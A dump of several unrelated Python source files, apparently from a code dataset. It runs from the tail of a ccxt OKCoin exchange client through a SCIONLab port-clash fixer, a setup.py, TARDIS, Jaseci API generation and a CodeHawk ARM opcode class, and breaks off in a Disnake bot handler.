# "size":"31.03998952",
# "timestamp":"2020-03-29T11:55:16.000Z",
# "trade_id":"18551600"
# }
# ]
#
return self.parse_my_trades(response, market, since, limit, params)
async def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):
"""
fetch all the trades made from a single order
:param str id: order id
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
request = {
# 'instrument_id': market['id'],
'order_id': id,
# 'after': '1', # return the page after the specified page number
# 'before': '1', # return the page before the specified page number
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
return await self.fetch_my_trades(symbol, since, limit, self.extend(request, params))
async def fetch_position(self, symbol, params={}):
"""
fetch data on a single open contract trade position
:param str symbol: unified market symbol of the market the position is held in, default is None
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `position structure <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
market = self.market(symbol)
method = None
request = {
'instrument_id': market['id'],
# 'order_id': id, # string
# 'after': '1', # pagination of data to return records earlier than the requested ledger_id
# 'before': '1', # P=pagination of data to return records newer than the requested ledger_id
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
type = market['type']
if (type == 'futures') or (type == 'swap'):
method = type + 'GetInstrumentIdPosition'
elif type == 'option':
underlying = self.safe_string(params, 'underlying')
if underlying is None:
raise ArgumentsRequired(self.id + ' fetchPosition() requires an underlying parameter for ' + type + ' market ' + symbol)
method = type + 'GetUnderlyingPosition'
else:
raise NotSupported(self.id + ' fetchPosition() does not support ' + type + ' market ' + symbol + ', supported market types are futures, swap or option')
response = await getattr(self, method)(self.extend(request, params))
#
# futures
#
# crossed margin mode
#
# {
# "result": True,
# "holding": [
# {
# "long_qty": "2",
# "long_avail_qty": "2",
# "long_avg_cost": "8260",
# "long_settlement_price": "8260",
# "realised_pnl": "0.00020928",
# "short_qty": "2",
# "short_avail_qty": "2",
# "short_avg_cost": "8259.99",
# "short_settlement_price": "8259.99",
# "liquidation_price": "113.81",
# "instrument_id": "BTC-USD-191227",
# "leverage": "10",
# "created_at": "2019-09-25T07:58:42.129Z",
# "updated_at": "2019-10-08T14:02:51.029Z",
# "margin_mode": "crossed",
# "short_margin": "0.00242197",
# "short_pnl": "6.63E-6",
# "short_pnl_ratio": "0.002477997",
# "short_unrealised_pnl": "6.63E-6",
# "long_margin": "0.00242197",
# "long_pnl": "-6.65E-6",
# "long_pnl_ratio": "-0.002478",
# "long_unrealised_pnl": "-6.65E-6",
# "long_settled_pnl": "0",
# "short_settled_pnl": "0",
# "last": "8257.57"
# }
# ],
# "margin_mode": "crossed"
# }
#
# fixed margin mode
#
# {
# "result": True,
# "holding": [
# {
# "long_qty": "4",
# "long_avail_qty": "4",
# "long_margin": "0.00323844",
# "long_liqui_price": "7762.09",
# "long_pnl_ratio": "0.06052306",
# "long_avg_cost": "8234.43",
# "long_settlement_price": "8234.43",
# "realised_pnl": "-0.00000296",
# "short_qty": "2",
# "short_avail_qty": "2",
# "short_margin": "0.00241105",
# "short_liqui_price": "9166.74",
# "short_pnl_ratio": "0.03318052",
# "short_avg_cost": "8295.13",
# "short_settlement_price": "8295.13",
# "instrument_id": "BTC-USD-191227",
# "long_leverage": "15",
# "short_leverage": "10",
# "created_at": "2019-09-25T07:58:42.129Z",
# "updated_at": "2019-10-08T13:12:09.438Z",
# "margin_mode": "fixed",
# "short_margin_ratio": "0.10292507",
# "short_maint_margin_ratio": "0.005",
# "short_pnl": "7.853E-5",
# "short_unrealised_pnl": "7.853E-5",
# "long_margin_ratio": "0.07103743",
# "long_maint_margin_ratio": "0.005",
# "long_pnl": "1.9841E-4",
# "long_unrealised_pnl": "1.9841E-4",
# "long_settled_pnl": "0",
# "short_settled_pnl": "0",
# "last": "8266.99"
# }
# ],
# "margin_mode": "fixed"
# }
#
# swap
#
# crossed margin mode
#
# {
# "margin_mode": "crossed",
# "timestamp": "2019-09-27T03:49:02.018Z",
# "holding": [
# {
# "avail_position": "3",
# "avg_cost": "59.49",
# "instrument_id": "LTC-USD-SWAP",
# "last": "55.98",
# "leverage": "10.00",
# "liquidation_price": "4.37",
# "maint_margin_ratio": "0.0100",
# "margin": "0.0536",
# "position": "3",
# "realized_pnl": "0.0000",
# "unrealized_pnl": "0",
# "settled_pnl": "-0.0330",
# "settlement_price": "55.84",
# "side": "long",
# "timestamp": "2019-09-27T03:49:02.018Z"
# },
# ]
# }
#
# fixed margin mode
#
# {
# "margin_mode": "fixed",
# "timestamp": "2019-09-27T03:47:37.230Z",
# "holding": [
# {
# "avail_position": "20",
# "avg_cost": "8025.0",
# "instrument_id": "BTC-USD-SWAP",
# "last": "8113.1",
# "leverage": "15.00",
# "liquidation_price": "7002.6",
# "maint_margin_ratio": "0.0050",
# "margin": "0.0454",
# "position": "20",
# "realized_pnl": "-0.0001",
# "unrealized_pnl": "0",
# "settled_pnl": "0.0076",
# "settlement_price": "8279.2",
# "side": "long",
# "timestamp": "2019-09-27T03:47:37.230Z"
# }
# ]
# }
#
# option
#
# {
# "holding":[
# {
# "instrument_id":"BTC-USD-190927-12500-C",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.017",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# },
# {
# "instrument_id":"BTC-USD-190927-12500-P",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.019",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# }
# ]
# }
#
# todo unify parsePosition/parsePositions
return response
async def fetch_positions(self, symbols=None, params={}):
"""
fetch all open positions
:param [str]|None symbols: not used by okcoin fetchPositions
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `position structure <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
method = None
defaultType = self.safe_string_2(self.options, 'fetchPositions', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
if (type == 'futures') or (type == 'swap'):
method = type + 'GetPosition'
elif type == 'option':
underlying = self.safe_string(params, 'underlying')
if underlying is None:
raise ArgumentsRequired(self.id + ' fetchPositions() requires an underlying parameter for ' + type + ' markets')
method = type + 'GetUnderlyingPosition'
else:
raise NotSupported(self.id + ' fetchPositions() does not support ' + type + ' markets, supported market types are futures, swap or option')
params = self.omit(params, 'type')
response = await getattr(self, method)(params)
#
# futures
#
# ...
#
#
# swap
#
# ...
#
# option
#
# {
# "holding":[
# {
# "instrument_id":"BTC-USD-190927-12500-C",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.017",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# },
# {
# "instrument_id":"BTC-USD-190927-12500-P",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.019",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# }
# ]
# }
#
# todo unify parsePosition/parsePositions
return response
async def fetch_ledger(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchLedger', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
suffix = '' if (type == 'account') else 'Accounts'
argument = ''
request = {
# 'from': 'id',
# 'to': 'id',
}
if limit is not None:
request['limit'] = limit
currency = None
if type == 'spot':
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires a currency code argument for '" + type + "' markets")
argument = 'Currency'
currency = self.currency(code)
request['currency'] = currency['id']
elif type == 'futures':
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires an underlying symbol for '" + type + "' markets")
argument = 'Underlying'
market = self.market(code) # we intentionally put a market inside here for the margin and swap ledgers
marketInfo = self.safe_value(market, 'info', {})
settlementCurrencyId = self.safe_string(marketInfo, 'settlement_currency')
settlementCurrencyCode = self.safe_currency_code(settlementCurrencyId)
currency = self.currency(settlementCurrencyCode)
underlyingId = self.safe_string(marketInfo, 'underlying')
request['underlying'] = underlyingId
elif (type == 'margin') or (type == 'swap'):
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires a code argument(a market symbol) for '" + type + "' markets")
argument = 'InstrumentId'
market = self.market(code) # we intentionally put a market inside here for the margin and swap ledgers
currency = self.currency(market['base'])
request['instrument_id'] = market['id']
#
# if type == 'margin':
# #
# # 3. Borrow
# # 4. Repayment
# # 5. Interest
# # 7. Buy
# # 8. Sell
# # 9. From capital account
# # 10. From C2C
# # 11. From Futures
# # 12. From Spot
# # 13. From ETT
# # 14. To capital account
# # 15. To C2C
# # 16. To Spot
# # 17. To Futures
# # 18. To ETT
# # 19. Mandatory Repayment
# # 20. From Piggybank
# # 21. To Piggybank
# # 22. From Perpetual
# # 23. To Perpetual
# # 24. Liquidation Fee
# # 54. Clawback
# # 59. Airdrop Return.
# #
# request['type'] = 'number' # All types will be returned if self filed is left blank
# }
#
elif type == 'account':
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
#
# #
# # 1. deposit
# # 2. withdrawal
# # 13. cancel withdrawal
# # 18. into futures account
# # 19. out of futures account
# # 20. into sub account
# # 21. out of sub account
# # 28. claim
# # 29. into ETT account
# # 30. out of ETT account
# # 31. into C2C account
# # 32. out of C2C account
# # 33. into margin account
# # 34. out of margin account
# # 37. into spot account
# # 38. out of spot account
# #
# request['type'] = 'number'
#
else:
raise NotSupported(self.id + " fetchLedger does not support the '" + type + "' type(the type must be one of 'account', 'spot', 'margin', 'futures', 'swap')")
method = type + 'Get' + suffix + argument + 'Ledger'
response = await getattr(self, method)(self.extend(request, query))
#
# transfer funds transfer in/out
# trade funds moved as a result of a trade, spot and margin accounts only
# rebate fee rebate as per fee schedule, spot and margin accounts only
# match open long/open short/close long/close short(futures) or a change in the amount because of trades(swap)
# fee fee, futures only
# settlement settlement/clawback/settle long/settle short
# liquidation force close long/force close short/deliver close long/deliver close short
# funding funding fee, swap only
# margin a change in the amount after adjusting margin, swap only
#
# account
#
# [
# {
# "amount":0.00051843,
# "balance":0.00100941,
# "currency":"BTC",
# "fee":0,
# "ledger_id":8987285,
# "timestamp":"2018-10-12T11:01:14.000Z",
# "typename":"Get from activity"
# }
# ]
#
# spot
#
# [
# {
# "timestamp":"2019-03-18T07:08:25.000Z",
# "ledger_id":"3995334780",
# "created_at":"2019-03-18T07:08:25.000Z",
# "currency":"BTC",
# "amount":"0.0009985",
# "balance":"0.0029955",
# "type":"trade",
# "details":{
# "instrument_id":"BTC-USDT",
# "order_id":"2500650881647616",
# "product_id":"BTC-USDT"
# }
# }
# ]
#
# margin
#
# [
# [
# {
# "created_at":"2019-03-20T03:45:05.000Z",
# "ledger_id":"78918186",
# "timestamp":"2019-03-20T03:45:05.000Z",
# "currency":"EOS",
# "amount":"0", # ?
# "balance":"0.59957711",
# "type":"transfer",
# "details":{
# "instrument_id":"EOS-USDT",
# "order_id":"787057",
# "product_id":"EOS-USDT"
# }
# }
# ],
# {
# "before":"78965766",
# "after":"78918186"
# }
# ]
#
# futures
#
# [
# {
# "ledger_id":"2508090544914461",
# "timestamp":"2019-03-19T14:40:24.000Z",
# "amount":"-0.00529521",
# "balance":"0",
# "currency":"EOS",
# "type":"fee",
# "details":{
# "order_id":"2506982456445952",
# "instrument_id":"EOS-USD-190628"
# }
# }
# ]
#
# swap
#
# [
# {
# "amount":"0.004742",
# "fee":"-0.000551",
# "type":"match",
# "instrument_id":"EOS-USD-SWAP",
# "ledger_id":"197429674941902848",
# "timestamp":"2019-03-25T05:56:31.286Z"
# },
# ]
#
responseLength = len(response)
if responseLength < 1:
return []
isArray = isinstance(response[0], list)
isMargin = (type == 'margin')
entries = response[0] if (isMargin and isArray) else response
if type == 'swap':
ledgerEntries = self.parse_ledger(entries)
return self.filter_by_symbol_since_limit(ledgerEntries, code, since, limit)
return self.parse_ledger(entries, currency, since, limit)
def parse_ledger_entry_type(self, type):
types = {
'transfer': 'transfer', # # funds transfer in/out
'trade': 'trade', # funds moved as a result of a trade, spot and margin accounts only
'rebate': 'rebate', # fee rebate as per fee schedule, spot and margin accounts only
'match': 'trade', # open long/open short/close long/close short(futures) or a change in the amount because of trades(swap)
'fee': 'fee', # fee, futures only
'settlement': 'trade', # settlement/clawback/settle long/settle short
'liquidation': 'trade', # force close long/force close short/deliver close long/deliver close short
'funding': 'fee', # funding fee, swap only
'margin': 'margin', # a change in the amount after adjusting margin, swap only
}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
#
# account
#
# {
# "amount":0.00051843,
# "balance":0.00100941,
# "currency":"BTC",
# "fee":0,
# "ledger_id":8987285,
# "timestamp":"2018-10-12T11:01:14.000Z",
# "typename":"Get from activity"
# }
#
# spot
#
# {
# "timestamp":"2019-03-18T07:08:25.000Z",
# "ledger_id":"3995334780",
# "created_at":"2019-03-18T07:08:25.000Z",
# "currency":"BTC",
# "amount":"0.0009985",
# "balance":"0.0029955",
# "type":"trade",
# "details":{
# "instrument_id":"BTC-USDT",
# "order_id":"2500650881647616",
# "product_id":"BTC-USDT"
# }
# }
#
# margin
#
# {
# "created_at":"2019-03-20T03:45:05.000Z",
# "ledger_id":"78918186",
# "timestamp":"2019-03-20T03:45:05.000Z",
# "currency":"EOS",
# "amount":"0", # ?
# "balance":"0.59957711",
# "type":"transfer",
# "details":{
# "instrument_id":"EOS-USDT",
# "order_id":"787057",
# "product_id":"EOS-USDT"
# }
# }
#
# futures
#
# {
# "ledger_id":"2508090544914461",
# "timestamp":"2019-03-19T14:40:24.000Z",
# "amount":"-0.00529521",
# "balance":"0",
# "currency":"EOS",
# "type":"fee",
# "details":{
# "order_id":"2506982456445952",
# "instrument_id":"EOS-USD-190628"
# }
# }
#
# swap
#
# {
# "amount":"0.004742",
# "fee":"-0.000551",
# "type":"match",
# "instrument_id":"EOS-USD-SWAP",
# "ledger_id":"197429674941902848",
# "timestamp":"2019-03-25T05:56:31.286Z"
# },
#
id = self.safe_string(item, 'ledger_id')
account = None
details = self.safe_value(item, 'details', {})
referenceId = self.safe_string(details, 'order_id')
referenceAccount = None
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
code = self.safe_currency_code(self.safe_string(item, 'currency'), currency)
amount = self.safe_number(item, 'amount')
timestamp = self.parse8601(self.safe_string(item, 'timestamp'))
fee = {
'cost': self.safe_number(item, 'fee'),
'currency': code,
}
before = None
after = self.safe_number(item, 'balance')
status = 'ok'
marketId = self.safe_string(item, 'instrument_id')
symbol = None
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
return {
'info': item,
'id': id,
'account': account,
'referenceId': referenceId,
'referenceAccount': referenceAccount,
'type': type,
'currency': code,
'symbol': symbol,
'amount': amount,
'before': before, # balance before
'after': after, # balance after
'status': status,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
isArray = isinstance(params, list)
request = '/api/' + api + '/' + self.version + '/'
request += path if isArray else self.implode_params(path, params)
query = params if isArray else self.omit(params, self.extract_params(path))
url = self.implode_hostname(self.urls['api']['rest']) + request
type = self.get_path_authentication_type(path)
if (type == 'public') or (type == 'information'):
if query:
url += '?' + self.urlencode(query)
elif type == 'private':
self.check_required_credentials()
timestamp = self.iso8601(self.milliseconds())
headers = {
'OK-ACCESS-KEY': self.apiKey,
'OK-ACCESS-PASSPHRASE': self.password,
'OK-ACCESS-TIMESTAMP': timestamp,
# 'OK-FROM': '',
# 'OK-TO': '',
# 'OK-LIMIT': '',
}
auth = timestamp + method + request
if method == 'GET':
if query:
urlencodedQuery = '?' + self.urlencode(query)
url += urlencodedQuery
auth += urlencodedQuery
else:
if isArray or query:
body = self.json(query)
auth += body
headers['Content-Type'] = 'application/json'
signature = self.hmac(self.encode(auth), self.encode(self.secret), hashlib.sha256, 'base64')
headers['OK-ACCESS-SIGN'] = signature
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def get_path_authentication_type(self, path):
# https://github.com/ccxt/ccxt/issues/6651
# a special case to handle the optionGetUnderlying interefering with
# other endpoints containing self keyword
if path == 'underlying':
return 'public'
auth = self.safe_value(self.options, 'auth', {})
key = self.find_broadly_matched_key(auth, path)
return self.safe_string(auth, key, 'private')
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if not response:
return # fallback to default error handler
feedback = self.id + ' ' + body
if code == 503:
# {"message":"name resolution failed"}
raise ExchangeNotAvailable(feedback)
#
# {"error_message":"Order does not exist","result":"true","error_code":"35029","order_id":"-1"}
#
message = self.safe_string(response, 'message')
errorCode = self.safe_string_2(response, 'code', 'error_code')
nonEmptyMessage = ((message is not None) and (message != ''))
nonZeroErrorCode = (errorCode is not None) and (errorCode != '0')
if nonEmptyMessage:
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
if nonZeroErrorCode:
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
if nonZeroErrorCode or nonEmptyMessage:
raise ExchangeError(feedback) # unknown message
|
py | b40411cc8da84a156c2c0a4a35191613b4c901cb | #!/usr/bin/env python3
# Copyright 2020 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod: scripts.port_clash_fixup
=========================
Prints existing port clashes and fixes them.
For every clash, the interface that was modified the first is kept, but
for all the other ones a new port is found, and the associated
AP's configuration version is bumped.
This is intended to be used only once.
Run with python manage.py runscript port_clash_fixup
"""
from collections import defaultdict
from django.db import transaction
from scionlab.models.core import Host, Interface
def run():
# get the clashes:
clashes = dict()
for h in Host.objects.all():
c = get_clashes(h)
if len(c):
clashes[h] = c
# print them
for k, v in clashes.items():
print('host {host} has {clashes} clashes:'.format(
host=k, clashes=len(v)))
for c in v:
print('\tsocket = {socket} IDs = {ids}'.format(socket=c[0], ids=c[1]))
# fix them
for clashes in clashes.values():
for c in clashes:
fix_clash(c[1])
def get_clashes(host):
"""
returns a list of (socket,[list_of_ids])
"""
sockets = defaultdict(list)
for iface in Interface.objects.filter(host=host):
socket = (iface.get_public_ip(), iface.public_port)
sockets[socket].append(iface.pk)
clashes = list()
for k, v in sockets.items():
if len(v) > 1:
clashes.append((k, v))
return clashes
@transaction.atomic
def fix_clash(iface_ids):
"""
sorts the interfaces by modification data of the user AS,
keeps the interface for the oldest modified user AS, and for the remaining interfaces
selects a new port and bumps the configuration for the user AS host
"""
ifaces = Interface.objects.\
filter(pk__in=iface_ids).\
order_by('-link_as_interfaceA__interfaceB__AS__modified_date')
# don't modify the AS that obtained that port the first
ifaces = ifaces[:len(ifaces)-1]
for iface in ifaces:
iface.public_port = iface.host.find_public_port()
iface.save()
iface.host.bump_config()
|
py | b404124e20300527775033aedb15760dd661cc3c | # Standard ear-reference
import numpy as np
def ear_reference(data):
return data
|
py | b404133dc455d3af035e0832fd933c69627e3b05 | from pkg_resources import parse_version
from configparser import ConfigParser
import setuptools
assert parse_version(setuptools.__version__)>=parse_version('36.2')
# note: all settings are in settings.ini; edit there, not here
config = ConfigParser(delimiters=['='])
config.read('settings.ini')
config = config['DEFAULT']
config_keys = 'version description keywords author author_email'.split()
expected = config_keys + "lib_name user branch license status min_python audience language".split()
for setting in expected:
assert setting in config, f"missing expected setting: {setting}"
setup_config = {setting:config[setting] for setting in config_keys}
licenses = {
'apache2': ('Apache Software License 2.0','OSI Approved :: Apache Software License'),
}
statuses = [ '1 - Planning', '2 - Pre-Alpha', '3 - Alpha',
'4 - Beta', '5 - Production/Stable', '6 - Mature', '7 - Inactive' ]
py_versions = '2.0 2.1 2.2 2.3 2.4 2.5 2.6 2.7 3.0 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9'.split()
requirements = config.get('requirements','').split()
lic = licenses[config['license']]
min_python = config['min_python']
setuptools.setup(
name = config['lib_name'],
license = lic[0],
classifiers = [
'Development Status :: ' + statuses[int(config['status'])],
'Intended Audience :: ' + config['audience'].title(),
'License :: ' + lic[1],
'Natural Language :: ' + config['language'].title(),
] + [f'Programming Language :: Python :: {version}' for version in py_versions[py_versions.index(min_python):]],
url = config['git_url'],
packages = setuptools.find_packages(),
include_package_data = True,
install_requires = requirements,
dependency_links = config.get('dep_links','').split(),
python_requires = '>=' + config['min_python'],
long_description = open('README.md').read(),
long_description_content_type = 'text/markdown',
zip_safe = False,
entry_points = { 'console_scripts': config.get('console_scripts','').split() },
**setup_config)
|
py | b404145f29605f9b522d6928c04d6281d853ff5b | # Functions that are important for the general usage of TARDIS.
import logging
logger = logging.getLogger(__name__)
def run_tardis(
config,
atom_data=None,
packet_source=None,
simulation_callbacks=[],
virtual_packet_logging=False,
show_convergence_plots=True,
log_level=None,
specific_log_level=None,
show_progress_bars=True,
**kwargs,
):
"""
Run TARDIS from a given config object.
It will return a model object containing the TARDIS Simulation.
Parameters
----------
config : str or dict or tardis.io.config_reader.Configuration
filename of configuration yaml file or dictionary or TARDIS Configuration object
atom_data : str or tardis.atomic.AtomData, optional
If atom_data is a string it is interpreted as a path to a file storing
the atomic data. Atomic data to use for this TARDIS simulation. If set to None (i.e. default),
the atomic data will be loaded according to keywords set in the configuration
packet_source : class, optional
A custom packet source class or a child class of `tardis.montecarlo.packet_source`
used to override the TARDIS `BasePacketSource` class.
simulation_callbacks : list of lists, default: `[]`, optional
Set of callbacks to call at the end of every iteration of the Simulation.
The format of the lists should look like:
[[callback1, callback_arg1], [callback2, callback_arg2], ...],
where the callback function signature should look like:
callback_function(simulation, extra_arg1, ...)
virtual_packet_logging : bool, default: False, optional
Option to enable virtual packet logging.
log_level : {'NOTSET', 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}, default: None, optional
Set the level of the TARDIS logger (follows native python logging framework log levels).
Use this parameter to override the `log_level` specified in the configuration file.
The default value `None` means that the `log_level` specified in the configuration file will be used.
specific_log_level : bool, default: None, optional
Allows to set specific logging levels, overriding the value in the configuration file.
If True, only show the log messages from a particular log level, set by `log_level`.
If False, the logger shows log messages belonging to the level set and all levels above it in severity.
The default value None means that the `specific_log_level` specified in the configuration file will be used.
show_convergence_plots : bool, default: True, optional
Option to enable tardis convergence plots.
show_progress_bars : bool, default: True, optional
Option to enable the progress bar.
**kwargs : dict, optional
Optional keyword arguments including those
supported by :obj:`tardis.visualization.tools.convergence_plot.ConvergencePlots`.
Returns
-------
tardis.simulation.Simulation
Notes
-----
Please see the `logging tutorial <https://tardis-sn.github.io/tardis/io/optional/logging_configuration.html>`_ to know more about `log_level` and `specific` options.
"""
from tardis.io.logger.logger import logging_state
from tardis.io.config_reader import Configuration
from tardis.io.atom_data.base import AtomData
from tardis.simulation import Simulation
if isinstance(config, Configuration):
tardis_config = config
else:
try:
tardis_config = Configuration.from_yaml(config)
except TypeError:
logger.debug(
"TARDIS Config not available via YAML. Reading through TARDIS Config Dictionary"
)
tardis_config = Configuration.from_config_dict(config)
if not isinstance(show_convergence_plots, bool):
raise TypeError("Expected bool in show_convergence_plots argument")
logging_state(log_level, tardis_config, specific_log_level)
if atom_data is not None:
try:
atom_data = AtomData.from_hdf(atom_data)
except TypeError:
logger.debug(
"Atom Data Cannot be Read from HDF. Setting to Default Atom Data"
)
atom_data = atom_data
simulation = Simulation.from_config(
tardis_config,
packet_source=packet_source,
atom_data=atom_data,
virtual_packet_logging=virtual_packet_logging,
show_convergence_plots=show_convergence_plots,
show_progress_bars=show_progress_bars,
**kwargs,
)
for cb in simulation_callbacks:
simulation.add_callback(*cb)
simulation.run()
return simulation
|
py | b40415809a860788279afd159a6f5b787a8604c0 | from django.urls import path
from .views import AbstractJacAPIView
from .views import AbstractAdminJacAPIView, AbstractPublicJacAPIView
from jaseci.element.element import element
from jaseci_serv.base.models import super_master
from jaseci.utils.utils import copy_func
from inspect import signature
import uuid
import json
def rest_api_auto_doc(endpoint: str, fsig: signature):
"""
Automatically return string for REST Interface documentation
Parameters include endpoint uri and signature
"""
doc = f"**REST Endpoint**: {endpoint}\n"
params = []
json_samp = {}
for i in fsig.parameters.keys():
if (i == 'self'):
continue
p_name = i
p_type = fsig.parameters[i].annotation
if(issubclass(p_type, element)):
params.append(
f'> {p_name}: UUID pointing to {p_type.__name__} object\n')
json_samp[p_name] = uuid.uuid4().urn
else:
params.append(f'> {p_name}: type {p_type.__name__}\n')
json_samp[p_name] = p_type()
if (p_type == str):
json_samp[p_name] = 'some string'
if (params):
doc += "\n**Parameters**:\n"
for i in params:
doc += i
doc += "\n**JSON Example**\n"
doc += f"```javascript\n{json.dumps(json_samp, indent=4)}\n```\n"
return doc
generated_urls = []
def generate_apis(api_list, view_cls, dir_head):
"""
Auto generates Django APIs based on core interface
"""
for i in api_list:
fname = '_'.join(i['groups'])
apidocstr = f"{dir_head}/{fname}"
func_sig = i['sig']
gen_cls = type(fname,
(view_cls,),
{})
gen_cls.post = copy_func(gen_cls.post)
gen_cls.post.__doc__ = i['doc'] + '\n\n' + \
rest_api_auto_doc(apidocstr, func_sig)
globals()[fname] = gen_cls
global generated_urls
generated_urls.append(
path(apidocstr, globals()[fname].as_view(), name=fname))
generate_apis(super_master._public_api, AbstractPublicJacAPIView, 'public')
generate_apis(super_master._private_api, AbstractJacAPIView, 'jac')
generate_apis(super_master._admin_api, AbstractAdminJacAPIView, 'admin')
|
py | b40415dcd70661fe538dc6da6ed30cb50af41d72 | # ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import List, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.arm.ARMDictionaryRecord import armregistry
from chb.arm.ARMOpcode import ARMOpcode, simplify_result
from chb.arm.ARMOperand import ARMOperand
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
import chb.arm.ARMDictionary
@armregistry.register_tag("ASR", ARMOpcode)
class ARMArithmeticShiftRight(ARMOpcode):
"""Arithmetic shift right (immediate, register)
ASR{S}<c> <Rd>, <Rm>, #<imm>
ASR{S}<c> <Rd>< <Rn>, <Rm>
tags[1]: <c>
args[0]: {S}
args[1]: index of op1 in armdictionary
args[2]: index of op2 in armdictionary
args[3]: index of op3 in armdictionary
args[4]: is-wide (thumb)
"""
def __init__(
self,
d: "chb.arm.ARMDictionary.ARMDictionary",
ixval: IndexedTableValue) -> None:
ARMOpcode.__init__(self, d, ixval)
self.check_key(2, 5, "ArithmeticShiftRight")
@property
def operands(self) -> List[ARMOperand]:
return [self.armd.arm_operand(i) for i in self.args[1:-1]]
def annotation(self, xdata: InstrXData) -> str:
"""xdata format: a:vxxxx .
vars[0]: lhs (Rd)
xprs[0]: rhs1 (Rm/Rn)
xprs[1]: rhs2 (Rm/imm)
xprs[2]: rhs1 >> rhs2 (syntactic)
xprs[3]: rhs1 >> rhs2 (simplified)
args[4]: is-wide (thumb)
"""
lhs = str(xdata.vars[0])
result = xdata.xprs[1]
rresult = xdata.xprs[2]
xresult = simplify_result(xdata.args[2], xdata.args[3], result, rresult)
return lhs + " := " + xresult
|
py | b40415f2eb625bd265817a1e03f651c3339ad79f | import logging
import os
import json
import disnake
import motor.motor_asyncio
import asyncio
from disnake.ext import commands
import views
config = json.load(open('config.json'))
async def handle_response(message: disnake.Message):
""" Handle auto responses """
for file in os.listdir('./responses'):
file_json = json.load(open('./responses/' + file))
for trigger in file_json['triggers']:
